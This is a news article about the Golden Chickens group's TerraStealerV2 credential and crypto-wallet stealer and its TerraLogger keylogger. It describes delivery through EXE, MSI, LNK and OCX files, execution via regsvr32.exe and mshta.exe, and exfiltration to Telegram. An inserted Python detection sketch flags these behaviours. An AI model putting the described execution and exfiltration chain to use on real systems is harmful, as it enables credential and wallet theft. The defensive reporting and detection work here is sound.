Golden Chickens Resurface with Two New Malware Tools in 2025 Cybercrime Wave
Let’s uncover how the new TerraStealerV2 malware is targeting your browser and crypto wallets. Are your credentials truly safe?

Cybercriminal group Golden Chickens is back in the spotlight, this time with a fresh arsenal of tools engineered to steal credentials, log keystrokes, and compromise user security at scale. The two new threats, dubbed TerraStealerV2 malware and TerraLogger, are the latest evidence of the group’s ongoing efforts to evolve their malware-as-a-service (MaaS) offerings.
For years, Golden Chickens, also known as Venom Spider, has been tied to major credential theft and infiltration campaigns, most notably through its More_eggs malware. But these new variants show a calculated pivot toward targeting browsers, crypto wallets, and user keystrokes more aggressively than ever. The malware duo is being spread through file formats like EXE, MSI, and even shortcut files like LNK, making it difficult to detect and easy to distribute.
What Is TerraStealerV2 and How Does It Work?
TerraStealerV2 malware is designed to harvest sensitive user data from browsers and cryptocurrency wallets. It scans for browser credentials, accesses saved logins, and attempts to extract information from browser extensions, potentially leading to crypto wallet theft if the extensions are used for asset management or trading. The malware is often delivered via OCX payloads, a type of ActiveX control file, pulled from shady domains like wetransfers[.]io. Once downloaded, it leverages legitimate Windows utilities like regsvr32.exe and mshta.exe to execute its payload while evading security systems.
Though it does attempt to pull Chrome login data, it fails to bypass the newer Application Bound Encryption (ABE) protocols introduced in Chrome post-July 2024, hinting that the tool may still be under active development or simply outdated. Data collected by TerraStealerV2 malware is then sent off to Telegram channels and external servers, allowing attackers real-time access to user credentials and activity.
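For defenders, the chain described above (an OCX payload run through regsvr32.exe or mshta.exe, then data sent to Telegram) can be turned into simple hunting rules. The Python sketch below is an added example, not code from the article or from any vendor report; the event field names, the user-writable path heuristic, the api.telegram.org host, and all sample events are assumptions constructed for illustration.

```python
import re

# Domain taken from the article, kept defanged in source and refanged for matching.
DELIVERY_DOMAINS = {"wetransfers[.]io".replace("[.]", ".")}
TELEGRAM_HOSTS = {"api.telegram.org"}      # assumption: Telegram Bot API host used for exfiltration
LOLBINS = {"regsvr32.exe", "mshta.exe"}    # Windows utilities named in the article
USER_WRITABLE = re.compile(r"\\(users|programdata|temp)\\", re.I)  # assumed staging paths
REMOTE_URL = re.compile(r"https?://([^/\s\"']+)", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (event_index, rule) pairs for simplified, hypothetical Sysmon-style events."""
    hits = []
    for i, ev in enumerate(events):
        exe = basename(ev.get("image", ""))
        cmd = ev.get("cmdline", "")
        host = ev.get("dest_host", "").lower()
        url_hosts = {h.lower() for h in REMOTE_URL.findall(cmd)}
        if ev["type"] == "process":
            if exe == "mshta.exe" and url_hosts:
                hits.append((i, "mshta_remote_url"))
            if exe == "regsvr32.exe" and re.search(r"\.ocx\b", cmd, re.I) and USER_WRITABLE.search(cmd):
                hits.append((i, "regsvr32_ocx_user_path"))
            if url_hosts & DELIVERY_DOMAINS:
                hits.append((i, "known_delivery_domain"))
        elif ev["type"] == "network":
            if exe in LOLBINS and host in TELEGRAM_HOSTS:
                hits.append((i, "lolbin_to_telegram"))
            if host in DELIVERY_DOMAINS:
                hits.append((i, "known_delivery_domain"))
    return hits

# Constructed sample events (not real telemetry); the last two are benign look-alikes.
D = next(iter(DELIVERY_DOMAINS))
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe", "cmdline": "mshta.exe https://example.invalid/a.hta"},
    {"type": "network", "image": r"C:\Users\bob\Downloads\setup.exe", "dest_host": D},
    {"type": "process", "image": r"C:\Windows\System32\regsvr32.exe", "cmdline": r"regsvr32.exe /s C:\Users\bob\AppData\Local\Temp\payload.ocx"},
    {"type": "network", "image": r"C:\Windows\System32\regsvr32.exe", "dest_host": "api.telegram.org"},
    {"type": "process", "image": r"C:\Windows\System32\regsvr32.exe", "cmdline": r"regsvr32.exe /s C:\Windows\System32\mscomctl.ocx"},
    {"type": "network", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "dest_host": "api.telegram.org"},
]
```

Calling detect(SAMPLE_EVENTS) flags the first four events and leaves the System32 OCX registration and the browser's own Telegram traffic alone.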
TerraLogger: A Silent Keylogging Threat
Unlike its data-harvesting counterpart, TerraLogger takes a simpler but no less dangerous approach. It acts as a standalone keylogger, quietly capturing every keystroke typed on the infected machine. From login credentials to personal chats, this malware can record it all. Though TerraLogger doesn’t currently exfiltrate data or interact with any command-and-control (C2) servers, its design hints at its future integration with broader malware campaigns. Golden Chickens may be planning to pair this keylogger with other tools in their ecosystem to create a more comprehensive infection chain. Despite its simplicity, TerraLogger still represents a major concern for browser security, especially when used in combination with data-exfiltration tools like TerraStealerV2.
How Are These Malware Variants Being Spread?
Golden Chickens is employing a variety of file types to distribute their malware, increasing the chances of infection. Common delivery formats include:
- Executables (EXE)
- Microsoft Installer files (MSI)
- Windows Shortcut files (LNK)
- OLE Control Extensions (OCX)
This multi-format approach makes it more likely for unsuspecting users to install the malware. Once executed, the payloads spring into action, mining for data or logging inputs while avoiding basic antivirus scans. Worse still, the use of known Windows utilities and Telegram for data transfer provides both obfuscation and control, as messages can be quickly customized or deleted on the attacker’s end.
What Does This Mean for Browser Security and Crypto Users?
The emergence of TerraStealerV2 malware signals a renewed focus on browser-based attacks. With many users storing credentials in Chrome or using browser extensions to manage cryptocurrencies, a single infection could compromise access to financial platforms, crypto wallets, or even corporate intranets. Meanwhile, the rise of crypto wallet theft through malware like TerraStealerV2 reflects a broader trend in cybercrime. Stealers are becoming more modular, more customizable, and harder to detect. Even though both TerraStealerV2 and TerraLogger appear to still be under development, their current functionality is already dangerous. As Golden Chickens continues to refine these tools, we can expect even more stealth, deeper system penetration, and broader targeting capabilities.
Ongoing Threat and Future Risks
The arrival of new malware tools from Golden Chickens demonstrates how many actors are developing new methods. Though TerraLogger is limited to being purely a keylogger, it could supply the keylogging function alongside the TerraStealerV2 malware or the rest of the malware toolkit as part of a larger multi-stage threat. With more reports of browser vulnerabilities and stolen crypto wallets, it is important to keep track of the continued availability of tools from groups like Golden Chickens. Users and organizations should be tracking everything they download, limiting the amount of insecure software they use, and ensuring their browsers are up to date with the latest security protocols. TerraStealerV2 and TerraLogger are just the start; they will continue to evolve, just as our responses must evolve.
Senior News Editor at Coinfomania, with a Master’s in English Literature, 16 years of teaching and writing experience, and over a decade immersed in the world of crypto. My work sits at the intersection of language and technology, translating fast-moving blockchain trends into clear, trustworthy journalism. Whether I’m curating daily headlines or analyzing market shifts, I bring depth, accuracy, and storytelling to the heart of Web3 media.